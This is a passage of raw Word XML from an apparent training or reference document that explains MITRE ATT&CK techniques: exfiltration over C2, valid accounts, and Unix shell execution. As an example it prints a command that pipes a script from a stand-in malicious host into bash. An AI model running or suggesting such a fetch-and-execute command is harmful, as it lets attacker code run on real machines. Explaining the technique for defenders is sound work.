            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0682E827" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BB1DA60" w14:textId="77777777" w:rsidR="001B2CDA" w:rsidRPr="003168F2" w:rsidRDefault="001B2CDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="014C9410" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29ADDA8A" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2513CE39" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF1EF17" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A6EA661" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12568498" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C26B8BB" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660ACE41" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB28EBD" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F576031" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7182EC7C" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067840E5" w14:textId="36122785" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5E4FC2" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Valid Accounts — T1078</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132692A8" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers gain access to systems by using legitimate usernames and passwords instead of exploiting software vulnerabilities. These credentials are commonly obtained through stolen login information, password reuse, phishing attacks, or compromised VPN accounts. Because the login activity appears legitimate, it often resembles normal user behavior and may bypass traditional security alerts and monitoring systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D4EDF4" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Common Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B988F4" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Stolen credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C7ADEA" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Password reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1767C978" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Phishing attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A8C3CF" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Compromised VPN accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6C8D0D" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Why It Matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6C160B" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Appears as legitimate user activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C969A9C" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Often bypasses security monitoring and alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B61AD4" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D300DC8" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>An attacker logs into a Linux server using stolen SSH credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678D9888" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="00000000" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="322D192A">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E218262" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2693AF70" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execution techniques allow attackers to run malicious code or commands on compromised systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABE1A42" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unix Shell — T1059.004</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A01FCCA" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers execute commands through Unix or Linux shell environments such as Bash, Sh, or Zsh. These shells provide direct access to system functions and are commonly used to run scripts, download malware, modify configurations, and control compromised devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794BAEAA" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Common Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6778B56E" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD5189A" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361D850B" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>zsh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2585BA35" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Common Uses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16455A79" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Running scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC97EA" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Downloading malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614CE28B" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Modifying system configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9BD61F" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D27248" w14:textId="6CADF425" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl http://malicious.site/payload.sh | bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6476FA96" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Network Device CLI — T1059.008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437842CE" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
